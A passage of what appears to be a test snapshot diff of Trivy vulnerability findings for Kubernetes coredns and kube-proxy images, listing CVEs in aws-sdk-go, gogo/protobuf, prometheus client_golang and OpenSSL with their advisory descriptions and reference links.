"https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", - ], - }, - "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.35.9", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.3.2", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-3121", - "installedVersion": "v1.3.1", - "packageName": "github.com/gogo/protobuf", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3121", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", - "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", - "https://github.com/advisories/GHSA-c3h9-896r-86jm", - "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", - "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", - "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", - "https://pkg.go.dev/vuln/GO-2021-0053", - "https://security.netapp.com/advisory/ntap-20210219-0006/", - "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3121", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3121", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0053", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.11.1", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-21698", - "installedVersion": "v1.8.0", - "packageName": "github.com/prometheus/client_golang", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8057", - "https://access.redhat.com/security/cve/CVE-2022-21698", - "https://bugzilla.redhat.com/2044628", - "https://bugzilla.redhat.com/2045880", - "https://bugzilla.redhat.com/2050648", - "https://bugzilla.redhat.com/2050742", - "https://bugzilla.redhat.com/2050743", - "https://bugzilla.redhat.com/2065290", - "https://bugzilla.redhat.com/2107342", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107376", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2107390", - "https://bugzilla.redhat.com/2107392", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", - "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", - "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", - "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://errata.almalinux.org/9/ALSA-2022-8057.html", - "https://errata.rockylinux.org/RLSA-2022:8057", - "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", - "https://github.com/prometheus/client_golang/pull/962", - "https://github.com/prometheus/client_golang/pull/987", - "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", - "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", - "https://linux.oracle.com/cve/CVE-2022-21698.html", - "https://linux.oracle.com/errata/ELSA-2022-8057.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", - "https://pkg.go.dev/vuln/GO-2022-0322", - "https://www.cve.org/CVERecord?id=CVE-2022-21698", - ], - }, - "category": "Vulnerability", - "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "Denial of service using InstrumentHandlerCounter", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-21698", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8057", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-21698", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2044628", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2045880", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050648", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050742", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050743", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2065290", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107342", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107376", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107390", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": 